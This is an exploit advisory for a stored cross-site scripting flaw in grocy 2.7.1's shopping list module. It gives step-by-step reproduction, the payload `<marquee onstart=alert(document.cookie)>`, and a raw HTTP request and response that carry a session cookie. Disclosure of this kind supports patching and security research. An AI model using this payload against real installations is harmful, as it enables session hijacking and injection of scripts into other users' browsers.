# Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting  
# Date: 2020-09-06  
# Exploit Author: Mufaddal Masalawala  
# Vendor Homepage:  
# Software Link:  
# Version: 2.7.1  
# Tested on: Kali Linux 2020.3  
# Proof Of Concept:  
grocy household management solution v2.7.1, allows stored XSS and HTML  
Injection, via Create Shopping List module, that is rendered upon  
deletiing that Shopping List.  
To exploit this vulnerability:  
1. Login to the application  
2. Go to 'Shooping List' module  
3. Click on 'New Shopping List' module  
4. Enter the payload: <marquee onstart=alert(document.cookie)> in 'Name'  
input field.  
5. Click Save  
6. Click 'Delete Shopping List'  
*#REQUEST -->*  
POST /api/objects/shopping_lists HTTP/1.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-type: application/json  
Content-Length: 38  
Connection: close  
Cookie: grocy_session=GhIjKZyST7Qkx18Q97u9MaPM1LsMtBmcJ6I59gxTO3Ks4WJXUd  
{"name":"<marquee onstart=alert(1)> "}  
*#RESPONSE -->*  
HTTP/1.1 200 OK  
Server: nginx/1.18.0  
Date: Sun, 06 Sep 2020 12:53:13 GMT  
Content-Type: application/json  
Connection: close  
X-Powered-By: PHP/7.3.21  
Content-Length: 26  
Mufaddal M